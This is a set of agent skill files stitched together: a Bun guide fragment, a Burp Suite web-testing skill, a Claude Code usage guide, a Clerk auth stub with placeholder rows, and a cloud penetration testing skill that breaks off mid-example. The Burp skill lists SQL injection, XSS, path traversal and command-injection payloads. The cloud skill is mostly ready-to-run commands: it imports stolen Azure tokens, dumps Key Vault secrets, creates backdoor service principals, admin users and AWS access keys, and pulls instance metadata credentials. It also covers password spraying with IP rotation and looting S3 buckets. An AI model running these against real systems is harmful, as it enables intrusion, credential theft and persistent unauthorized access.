bun add -d @types/bun
```

### 8.3 Differences from Node.js

```typescript
// ❌ Node.js specific (may not work)
require("module")         // Use import instead
require.resolve("pkg")    // Use import.meta.resolve
__non_webpack_require__   // Not supported

// ✅ Bun equivalents
import pkg from "pkg";
const resolved = import.meta.resolve("pkg");
Bun.resolveSync("pkg", process.cwd());

// ❌ These globals differ
process.hrtime()   // Use Bun.nanoseconds()
setImmediate()     // Use queueMicrotask()

// ✅ Bun-specific features
const file = Bun.file("./data.txt");     // Fast file API
Bun.serve({ port: 3000, fetch: ... });   // Fast HTTP server
Bun.password.hash(password);             // Built-in hashing
```

---
## 9. Performance Tips

### 9.1 Use Bun-native APIs

```typescript
// Slow (Node.js compat)
import fs from "fs/promises";
const content = await fs.readFile("./data.txt", "utf-8");

// Fast (Bun-native)
const file = Bun.file("./data.txt");
const content2 = await file.text(); // distinct name to avoid redeclaring `content`
```

### 9.2 Use Bun.serve for HTTP

```typescript
// Don't: Express/Fastify (overhead)
import express from "express";
const app = express();

// Do: Bun.serve (native, 4-10x faster)
Bun.serve({
  fetch(req) {
    return new Response("Hello!");
  },
});

// Or use Elysia (Bun-optimized framework)
import { Elysia } from "elysia";
new Elysia().get("/", () => "Hello!").listen(3000);
```

### 9.3 Bundle for Production

```bash
# Always bundle and minify for production
bun build ./src/index.ts --outdir ./dist --minify --target node

# Then run the bundle
bun run ./dist/index.js
```

---
## Quick Reference

| Task | Command |
| :----------- | :----------------------------------------- |
| Init project | `bun init` |
| Install deps | `bun install` |
| Add package | `bun add <pkg>` |
| Run script | `bun run <script>` |
| Run file | `bun run file.ts` |
| Watch mode | `bun --watch run file.ts` |
| Run tests | `bun test` |
| Build | `bun build ./src/index.ts --outdir ./dist` |
| Execute pkg | `bunx <pkg>` |

---

## Resources

- [Bun Documentation](https://bun.sh/docs)
- [Bun GitHub](https://github.com/oven-sh/bun)
- [Elysia Framework](https://elysiajs.com/)
- [Bun Discord](https://bun.sh/discord)
skills/burp-suite-testing/SKILL.md (new file, 377 lines)
---
name: Burp Suite Web Application Testing
description: This skill should be used when the user asks to "intercept HTTP traffic", "modify web requests", "use Burp Suite for testing", "perform web vulnerability scanning", "test with Burp Repeater", "analyze HTTP history", or "configure proxy for web testing". It provides comprehensive guidance for using Burp Suite's core features for web application security testing.
---

# Burp Suite Web Application Testing

## Purpose

Execute comprehensive web application security testing using Burp Suite's integrated toolset, including HTTP traffic interception and modification, request analysis and replay, automated vulnerability scanning, and manual testing workflows. This skill enables systematic discovery and exploitation of web application vulnerabilities through proxy-based testing methodology.

## Inputs / Prerequisites

### Required Tools

- Burp Suite Community or Professional Edition installed
- Burp's embedded browser or configured external browser
- Target web application URL
- Valid credentials for authenticated testing (if applicable)

### Environment Setup

- Burp Suite launched with temporary or named project
- Proxy listener active on 127.0.0.1:8080 (default)
- Browser configured to use Burp proxy (or use Burp's browser)
- CA certificate installed for HTTPS interception

### Editions Comparison

| Feature | Community | Professional |
|---------|-----------|--------------|
| Proxy | ✓ | ✓ |
| Repeater | ✓ | ✓ |
| Intruder | Limited | Full |
| Scanner | ✗ | ✓ |
| Extensions | ✓ | ✓ |
## Outputs / Deliverables

### Primary Outputs

- Intercepted and modified HTTP requests/responses
- Vulnerability scan reports with remediation advice
- HTTP history and site map documentation
- Proof-of-concept exploits for identified vulnerabilities

## Core Workflow

### Phase 1: Intercepting HTTP Traffic

#### Launch Burp's Browser

Use the integrated browser for seamless proxy integration:

1. Open Burp Suite and create/open project
2. Go to **Proxy > Intercept** tab
3. Click **Open Browser** to launch preconfigured browser
4. Position windows to view both Burp and browser simultaneously

#### Configure Interception

Control which requests are captured:

```
Proxy > Intercept > Intercept is on/off toggle

When ON: Requests pause for review/modification
When OFF: Requests pass through, logged to history
```

#### Intercept and Forward Requests

Process intercepted traffic:

1. Set intercept toggle to **Intercept on**
2. Navigate to target URL in browser
3. Observe request held in Proxy > Intercept tab
4. Review request contents (headers, parameters, body)
5. Click **Forward** to send request to server
6. Continue forwarding subsequent requests until page loads

#### View HTTP History

Access complete traffic log:

1. Go to **Proxy > HTTP history** tab
2. Click any entry to view full request/response
3. Sort by clicking column headers (# for chronological order)
4. Use filters to focus on relevant traffic

### Phase 2: Modifying Requests

#### Intercept and Modify

Change request parameters before forwarding:

1. Enable interception: **Intercept on**
2. Trigger target request in browser
3. Locate parameter to modify in intercepted request
4. Edit value directly in request editor
5. Click **Forward** to send modified request

#### Common Modification Targets

| Target | Example | Purpose |
|--------|---------|---------|
| Price parameters | `price=1` | Test business logic |
| User IDs | `userId=admin` | Test access control |
| Quantity values | `qty=-1` | Test input validation |
| Hidden fields | `isAdmin=true` | Test privilege escalation |

#### Example: Price Manipulation

```http
POST /cart HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

productId=1&quantity=1&price=100

# Modify to:
productId=1&quantity=1&price=1
```

Result: Item added to cart at modified price.
### Phase 3: Setting Target Scope

#### Define Scope

Focus testing on specific target:

1. Go to **Target > Site map**
2. Right-click target host in left panel
3. Select **Add to scope**
4. When prompted, click **Yes** to exclude out-of-scope traffic

#### Filter by Scope

Remove noise from HTTP history:

1. Click display filter above HTTP history
2. Select **Show only in-scope items**
3. History now shows only target site traffic

#### Scope Benefits

- Reduces clutter from third-party requests
- Prevents accidental testing of out-of-scope sites
- Improves scanning efficiency
- Creates cleaner reports

### Phase 4: Using Burp Repeater

#### Send Request to Repeater

Prepare request for manual testing:

1. Identify interesting request in HTTP history
2. Right-click request and select **Send to Repeater**
3. Go to **Repeater** tab to access request

#### Modify and Resend

Test different inputs efficiently:

```
1. View request in Repeater tab
2. Modify parameter values
3. Click Send to submit request
4. Review response in right panel
5. Use navigation arrows to review request history
```

#### Repeater Testing Workflow

```
Original Request:
GET /product?productId=1 HTTP/1.1

Test 1: productId=2 → Valid product response
Test 2: productId=999 → Not Found response
Test 3: productId=' → Error/exception response
Test 4: productId=1 OR 1=1 → SQL injection test
```

#### Analyze Responses

Look for indicators of vulnerabilities:

- Error messages revealing stack traces
- Framework/version information disclosure
- Different response lengths indicating logic flaws
- Timing differences suggesting blind injection
- Unexpected data in responses

### Phase 5: Running Automated Scans

#### Launch New Scan

Initiate vulnerability scanning (Professional only):

1. Go to **Dashboard** tab
2. Click **New scan**
3. Enter target URL in **URLs to scan** field
4. Configure scan settings

#### Scan Configuration Options

| Mode | Description | Duration |
|------|-------------|----------|
| Lightweight | High-level overview | ~15 minutes |
| Fast | Quick vulnerability check | ~30 minutes |
| Balanced | Standard comprehensive scan | ~1-2 hours |
| Deep | Thorough testing | Several hours |

#### Monitor Scan Progress

Track scanning activity:

1. View task status in **Dashboard**
2. Watch **Target > Site map** update in real-time
3. Check **Issues** tab for discovered vulnerabilities

#### Review Identified Issues

Analyze scan findings:

1. Select scan task in Dashboard
2. Go to **Issues** tab
3. Click issue to view:
   - **Advisory**: Description and remediation
   - **Request**: Triggering HTTP request
   - **Response**: Server response showing vulnerability

### Phase 6: Intruder Attacks

#### Configure Intruder

Set up automated attack:

1. Send request to Intruder (right-click > Send to Intruder)
2. Go to **Intruder** tab
3. Define payload positions using § markers
4. Select attack type

#### Attack Types

| Type | Description | Use Case |
|------|-------------|----------|
| Sniper | Single position, iterate payloads | Fuzzing one parameter |
| Battering ram | Same payload all positions | Credential testing |
| Pitchfork | Parallel payload iteration | Username:password pairs |
| Cluster bomb | All payload combinations | Full brute force |

#### Configure Payloads

```
Positions Tab:
POST /login HTTP/1.1
...
username=§admin§&password=§password§

Payloads Tab:
Set 1: admin, user, test, guest
Set 2: password, 123456, admin, letmein
```
#### Analyze Results
|
||||
Review attack output:
|
||||
|
||||
- Sort by response length to find anomalies
|
||||
- Filter by status code for successful attempts
|
||||
- Use grep to search for specific strings
|
||||
- Export results for documentation
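
The "sort by response length" triage above can be sketched programmatically over exported results; a minimal sketch, assuming rows of `(payload, status, length)` tuples (the sample data is hypothetical):

```python
import statistics

def find_anomalies(results, threshold=0.2):
    """Flag responses whose length deviates from the median by more than
    `threshold` (as a fraction) - a common sign of a logic difference."""
    lengths = [length for _, _, length in results]
    median = statistics.median(lengths)
    anomalies = []
    for payload, status, length in results:
        if median and abs(length - median) / median > threshold:
            anomalies.append((payload, status, length))
    return anomalies

# Hypothetical exported Intruder rows: the much-shorter redirect stands out
results = [
    ("admin", 200, 5210),
    ("user", 200, 5198),
    ("admin' OR '1'='1'--", 302, 880),
]
print(find_anomalies(results))  # → [("admin' OR '1'='1'--", 302, 880)]
```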

## Quick Reference

### Keyboard Shortcuts

| Action | Windows/Linux | macOS |
|--------|---------------|-------|
| Forward request | Ctrl+F | Cmd+F |
| Drop request | Ctrl+D | Cmd+D |
| Send to Repeater | Ctrl+R | Cmd+R |
| Send to Intruder | Ctrl+I | Cmd+I |
| Toggle intercept | Ctrl+T | Cmd+T |

### Common Testing Payloads

```
# SQL Injection
' OR '1'='1
' OR '1'='1'--
1 UNION SELECT NULL--

# XSS
<script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)

# Path Traversal
../../../etc/passwd
..\..\..\..\windows\win.ini

# Command Injection
; ls -la
| cat /etc/passwd
`whoami`
```
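
Payloads like these usually need URL-encoding before they survive a query string; a minimal helper using only the standard library:

```python
from urllib.parse import quote

payloads = ["' OR '1'='1", "<script>alert(1)</script>", "../../../etc/passwd"]

for p in payloads:
    # safe="" percent-encodes every reserved character, so the payload
    # is not mangled by query-string parsing on the way in
    print(quote(p, safe=""))
```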

### Request Modification Tips
- Right-click for context menu options
- Use Decoder for encoding/decoding
- Compare requests using the Comparer tool
- Save interesting requests to the project

## Constraints and Guardrails

### Operational Boundaries
- Test only authorized applications
- Configure scope to prevent accidental out-of-scope testing
- Rate-limit scans to avoid denial of service
- Document all findings and actions

### Technical Limitations
- Community Edition lacks the automated scanner
- Some sites may block proxy traffic
- HSTS/certificate pinning may require additional configuration
- Heavy scanning may trigger WAF blocks

### Best Practices
- Always set target scope before extensive testing
- Use Burp's browser for reliable interception
- Save the project regularly to preserve work
- Review scan results manually for false positives

## Examples

### Example 1: Business Logic Testing

**Scenario**: E-commerce price manipulation

1. Add an item to the cart normally, intercept the request
2. Identify the `price=9999` parameter in the POST body
3. Modify to `price=1`
4. Forward the request
5. Complete checkout at the manipulated price

**Finding**: Server trusts client-provided price values.
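
The remediation is to never trust a client-supplied price: look it up server-side by product ID at checkout. A minimal sketch (the catalog and cart shapes are assumptions for illustration):

```python
CATALOG = {"sku-123": 9999}  # authoritative server-side prices, in cents

def checkout_total(cart):
    """Compute the total from the server-side catalog, ignoring any
    price field the client may have sent with the cart items."""
    total = 0
    for item in cart:
        total += CATALOG[item["sku"]] * item["qty"]  # KeyError on unknown SKU
    return total

# A tampered cart claiming price=1 has no effect on the total:
print(checkout_total([{"sku": "sku-123", "qty": 1, "price": 1}]))  # → 9999
```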

### Example 2: Authentication Bypass

**Scenario**: Testing a login form

1. Submit valid credentials, capture the request in Proxy
2. Send the request to Repeater for testing
3. Try: `username=admin' OR '1'='1'--`
4. Observe a successful login response

**Finding**: SQL injection in authentication.

### Example 3: Information Disclosure

**Scenario**: Error-based information gathering

1. Navigate to a product page, observe the `productId` parameter
2. Send the request to Repeater
3. Change `productId=1` to `productId=test`
4. Observe a verbose error revealing the framework version

**Finding**: Apache Struts 2.5.12 disclosed in a stack trace.

## Troubleshooting

### Browser Not Connecting Through Proxy
- Verify the proxy listener is active (Proxy > Options)
- Check browser proxy settings point to 127.0.0.1:8080
- Ensure no firewall is blocking local connections
- Use Burp's embedded browser for a reliable setup

### HTTPS Interception Failing
- Install the Burp CA certificate in the browser/system
- Navigate to http://burp to download the certificate
- Add the certificate to trusted roots
- Restart the browser after installation

### Slow Performance
- Limit scope to reduce processing
- Disable unnecessary extensions
- Increase the Java heap size in startup options
- Close unused Burp tabs and features

### Requests Not Being Intercepted
- Verify "Intercept on" is enabled
- Check intercept rules aren't filtering the target
- Ensure the browser is using the Burp proxy
- Verify the target isn't using an unsupported protocol

68
skills/claude-code-guide/SKILL.md
Normal file
@@ -0,0 +1,68 @@

---
name: Claude Code Guide
description: Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies, "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.
---

# Claude Code Guide

## Purpose

To provide a comprehensive reference for configuring and using Claude Code (the agentic coding tool) to its full potential. This skill synthesizes best practices, configuration templates, and advanced usage patterns.

## Configuration (`CLAUDE.md`)

When starting a new project, create a `CLAUDE.md` file in the root directory to guide the agent.

### Template (General)

```markdown
# Project Guidelines

## Commands

- Run app: `npm run dev`
- Test: `npm test`
- Build: `npm run build`

## Code Style

- Use TypeScript for all new code.
- Functional components with Hooks for React.
- Tailwind CSS for styling.
- Early returns for error handling.

## Workflow

- Read `README.md` first to understand project context.
- Before editing, read the file content.
- After editing, run tests to verify.
```

## Advanced Features

### Thinking Keywords

Use these keywords in your prompts to trigger deeper reasoning from the agent:

- "Think step-by-step"
- "Analyze the root cause"
- "Plan before executing"
- "Verify your assumptions"

### Debugging

If the agent is stuck or behaving unexpectedly:

1. **Clear Context**: Start a new session or ask the agent to "forget previous instructions" if it is confused.
2. **Explicit Instructions**: Be extremely specific about paths, filenames, and desired outcomes.
3. **Logs**: Ask the agent to "check the logs" or "run the command with verbose output".

## Best Practices

1. **Small Contexts**: Don't dump the entire codebase into the context. Use `grep` or `find` to locate relevant files first.
2. **Iterative Development**: Ask for small changes, verify, then proceed.
3. **Feedback Loop**: If the agent makes a mistake, correct it immediately and ask it to "add a lesson" to its memory (if supported) or `CLAUDE.md`.

## Reference

Based on [Claude Code Guide by zebbern](https://github.com/zebbern/claude-code-guide).

56
skills/clerk-auth/SKILL.md
Normal file
@@ -0,0 +1,56 @@

---
name: clerk-auth
description: "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync. Use when: adding authentication, clerk auth, user authentication, sign in, sign up."
source: vibeship-spawner-skills (Apache 2.0)
---

# Clerk Authentication

## Patterns

### Next.js App Router Setup

Complete Clerk setup for the Next.js 14/15 App Router. Includes ClerkProvider, environment variables, and basic sign-in/sign-up components.

Key components:
- ClerkProvider: Wraps the app for auth context
- <SignIn />, <SignUp />: Pre-built auth forms
- <UserButton />: User menu with session management

### Middleware Route Protection

Protect routes using clerkMiddleware and createRouteMatcher.

Best practices:
- Single middleware.ts file at the project root
- Use createRouteMatcher for route groups
- auth.protect() for explicit protection
- Centralize all auth logic in middleware

### Server Component Authentication

Access auth state in Server Components using auth() and currentUser().

Key functions:
- auth(): Returns userId, sessionId, orgId, claims
- currentUser(): Returns the full User object
- Both require clerkMiddleware to be configured

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |
| Issue | medium | See docs |

498
skills/cloud-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,498 @@

---
name: Cloud Penetration Testing
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
---

# Cloud Penetration Testing

## Purpose

Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.

## Prerequisites

### Required Tools
```bash
# Azure tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force

# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install

# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init

# Additional tools
pip install scoutsuite pacu
```

### Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts

### Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement

## Outputs and Deliverables

1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform

## Core Workflow

### Phase 1: Reconnaissance

Gather initial information about the target's cloud presence:

```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"

# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"

# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany

# Check IPs against cloud providers
cat ips.txt | python3 ip2provider.py
```
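
The `ip2provider.py` step above maps IPs onto the providers' published address ranges; the idea can be sketched with the standard library (the CIDR blocks below are a tiny illustrative subset, not the providers' real lists):

```python
import ipaddress

# Illustrative subset only; real tooling pulls the providers' published
# range files (e.g. AWS ip-ranges.json) and loads them here
PROVIDER_RANGES = {
    "aws": ["52.95.0.0/16"],
    "gcp": ["34.64.0.0/10"],
    "azure": ["20.33.0.0/16"],
}

def classify_ip(ip):
    """Return the first provider whose ranges contain `ip`, else 'unknown'."""
    addr = ipaddress.ip_address(ip)
    for provider, cidrs in PROVIDER_RANGES.items():
        if any(addr in ipaddress.ip_network(c) for c in cidrs):
            return provider
    return "unknown"

print(classify_ip("52.95.1.10"))  # → aws
print(classify_ip("8.8.8.8"))     # → unknown
```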

### Phase 2: Azure Authentication

Authenticate to Azure environments:

```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount

# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential

# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'

# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json

# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```

### Phase 3: Azure Enumeration

Discover Azure resources and permissions:

```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription

# Current user role assignments
Get-AzRoleAssignment

# List resources
Get-AzResource
Get-AzResourceGroup

# Storage accounts
Get-AzStorageAccount

# Web applications
Get-AzWebApp

# SQL Servers and databases
Get-AzSqlServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG

# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile

# List all users
Get-MsolUser -All

# List all groups
Get-MsolGroup -All

# Global Admins
Get-MsolRole -RoleName "Company Administrator"
Get-MsolGroupMember -GroupObjectId $GUID

# Service Principals
Get-MsolServicePrincipal
```

### Phase 4: Azure Exploitation

Exploit Azure misconfigurations:

```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
    $props = @()
    $user | Get-Member | ForEach-Object{$props += $_.Name}
    foreach($prop in $props){
        if($user.$prop -like "*password*"){
            Write-Output ("[*] " + $user.UserPrincipalName + " [" + $prop + "] : " + $user.$prop)
        }
    }
}

# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1

# Extract VM UserData
$vms = Get-AzVM
$vms.UserData

# Dump Key Vault secrets
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```
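
The Key Vault dump above can be scripted around the az CLI; a hedged sketch that parses the tsv ID list and shows each secret (assumes `az` is on PATH and the session is already authorized):

```python
import subprocess

def parse_ids(tsv_output):
    """`--output tsv` on `[].id` yields one secret URI per line; drop blanks."""
    return [line.strip() for line in tsv_output.splitlines() if line.strip()]

def dump_vault(vault):
    # List the secret IDs, then fetch each one (assumes az CLI + auth)
    out = subprocess.run(
        ["az", "keyvault", "secret", "list", "--vault-name", vault,
         "--query", "[].id", "--output", "tsv"],
        capture_output=True, text=True, check=True).stdout
    for secret_id in parse_ids(out):
        subprocess.run(["az", "keyvault", "secret", "show", "--id", secret_id],
                       check=True)
```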

### Phase 5: Azure Persistence

Establish persistence in Azure:

```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)

# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId

# Login as service principal
$cred = Get-Credential # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal

# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```

### Phase 6: AWS Authentication

Authenticate to AWS environments:

```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format

# Use a specific profile
aws configure --profile target

# Test credentials
aws sts get-caller-identity
```

### Phase 7: AWS Enumeration

Discover AWS resources:

```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles

# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir

# EC2 Instances
aws ec2 describe-instances

# RDS Databases
aws rds describe-db-instances --region us-east-1

# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>

# EKS Clusters
aws eks list-clusters --region us-east-1

# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```
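
`describe-instances` returns nested Reservations → Instances JSON; a small helper to pull out just the public IPs (the sample document mirrors the CLI's output shape):

```python
def public_ips(describe_instances_output):
    """Extract PublicIpAddress values from `aws ec2 describe-instances` JSON."""
    ips = []
    for reservation in describe_instances_output.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            ip = instance.get("PublicIpAddress")
            if ip:  # instances without a public IP omit the key
                ips.append(ip)
    return ips

sample = {"Reservations": [
    {"Instances": [{"InstanceId": "i-0abc", "PublicIpAddress": "54.1.2.3"},
                   {"InstanceId": "i-0def"}]},  # second instance: no public IP
]}
print(public_ips(sample))  # → ['54.1.2.3']
```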

### Phase 8: AWS Exploitation

Exploit AWS misconfigurations:

```bash
# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible

# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'

# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# IMDSv2 access
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```
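
The two-step IMDSv2 flow above (PUT for a session token, then GET with the token header) can be written in Python with only `urllib`; it only resolves from inside an EC2 instance, so this is a sketch:

```python
import urllib.request

IMDS = "http://169.254.169.254"

def build_token_request(ttl=21600):
    # IMDSv2 step 1: PUT to the token endpoint with a TTL header
    return urllib.request.Request(
        IMDS + "/latest/api/token", method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})

def imds_v2_get(path):
    """IMDSv2 step 2: GET a metadata path, presenting the session token."""
    token = urllib.request.urlopen(build_token_request(), timeout=2).read().decode()
    req = urllib.request.Request(
        IMDS + "/latest/meta-data/" + path,
        headers={"X-aws-ec2-metadata-token": token})
    return urllib.request.urlopen(req, timeout=2).read().decode()

# e.g. imds_v2_get("iam/security-credentials/")  # only works on EC2
```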

### Phase 9: AWS Persistence

Establish persistence in AWS:

```bash
# List existing access keys
aws iam list-access-keys --user-name <username>

# Create backdoor access key
aws iam create-access-key --user-name <username>

# Get all EC2 public IPs
for region in $(cat regions.txt); do
    aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done
```

### Phase 10: GCP Enumeration

Discover GCP resources:

```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list

# Account information
gcloud config list
gcloud organizations list
gcloud projects list

# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>

# Enabled services
gcloud services list

# Source code repos
gcloud source repos list
gcloud source repos clone <repo>

# Compute instances
gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"

# Storage buckets
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local

# SQL instances
gcloud sql instances list
gcloud sql databases list --instance <id>

# Kubernetes
gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info
```

### Phase 11: GCP Exploitation

Exploit GCP misconfigurations:

```bash
# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"

# Check access scopes
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'

# Decrypt data with a keyring
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global

# Serverless function analysis
gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100

# Find stored credentials
sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list
```

## Quick Reference

### Azure Key Commands

| Action | Command |
|--------|---------|
| Login | `Connect-AzAccount` |
| List subscriptions | `Get-AzSubscription` |
| List users | `Get-MsolUser -All` |
| List groups | `Get-MsolGroup -All` |
| Current roles | `Get-AzRoleAssignment` |
| List VMs | `Get-AzVM` |
| List storage | `Get-AzStorageAccount` |
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |

### AWS Key Commands

| Action | Command |
|--------|---------|
| Configure | `aws configure` |
| Caller identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List S3 buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |

### GCP Key Commands

| Action | Command |
|--------|---------|
| Login | `gcloud auth login` |
| List projects | `gcloud projects list` |
| List instances | `gcloud compute instances list` |
| List buckets | `gsutil ls` |
| List clusters | `gcloud container clusters list` |
| IAM policy | `gcloud projects get-iam-policy <project>` |
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |

### Metadata Service URLs

| Provider | URL |
|----------|-----|
| AWS | `http://169.254.169.254/latest/meta-data/` |
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
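
The table above can be encoded as data for scripted probing; note the required auth header differs per provider (AWS IMDSv2's extra token step is omitted here for brevity):

```python
METADATA = {
    "aws":   {"url": "http://169.254.169.254/latest/meta-data/",
              "headers": {}},  # IMDSv1; IMDSv2 needs a session token first
    "azure": {"url": "http://169.254.169.254/metadata/instance?api-version=2018-02-01",
              "headers": {"Metadata": "true"}},
    "gcp":   {"url": "http://metadata.google.internal/computeMetadata/v1/",
              "headers": {"Metadata-Flavor": "Google"}},
}

def probe_command(provider):
    """Build the equivalent curl command line for a provider."""
    entry = METADATA[provider]
    flags = " ".join(f"-H '{k}: {v}'" for k, v in entry["headers"].items())
    return f"curl {flags} {entry['url']}".replace("  ", " ")

print(probe_command("gcp"))
```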

### Useful Tools

| Tool | Purpose |
|------|---------|
| ScoutSuite | Multi-cloud security auditing |
| Pacu | AWS exploitation framework |
| AzureHound | Azure AD attack path mapping |
| ROADTools | Azure AD enumeration |
| WeirdAAL | AWS service enumeration |
| MicroBurst | Azure security assessment |
| PowerZure | Azure post-exploitation |

## Constraints and Limitations

### Legal Requirements
- Only test with explicit written authorization
- Respect scope boundaries between cloud accounts
- Do not access production customer data
- Document all testing activities

### Technical Limitations
- MFA may prevent credential-based attacks
- Conditional Access policies may restrict access
- CloudTrail/Activity Logs record all API calls
- Some resources require specific regional access

### Detection Considerations
- Cloud providers log all API activity
- Unusual access patterns trigger alerts
- Use slow, deliberate enumeration
- Consider GuardDuty, Security Center, and Cloud Armor

## Examples

### Example 1: Azure Password Spray

**Scenario:** Test the Azure AD password policy

```powershell
# Using MSOLSpray with FireProx for IP rotation
# First create a FireProx endpoint
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create

# Spray passwords
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
```

### Example 2: AWS S3 Bucket Enumeration

**Scenario:** Find and access misconfigured S3 buckets

```bash
# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt

# Check each bucket for contents
while read bucket; do
    echo "Checking: $bucket"
    aws s3 ls s3://$bucket 2>/dev/null
done < buckets.txt

# Download an interesting bucket
aws s3 sync s3://misconfigured-bucket ./loot/
```

### Example 3: GCP Service Account Compromise

**Scenario:** Pivot using a compromised service account

```bash
# Authenticate with the service account key
gcloud auth activate-service-account --key-file compromised-sa.json

# List accessible projects
gcloud projects list

# Enumerate compute instances
gcloud compute instances list --project target-project

# Check for SSH keys in metadata
gcloud compute project-info describe --project target-project | grep ssh

# SSH to an instance
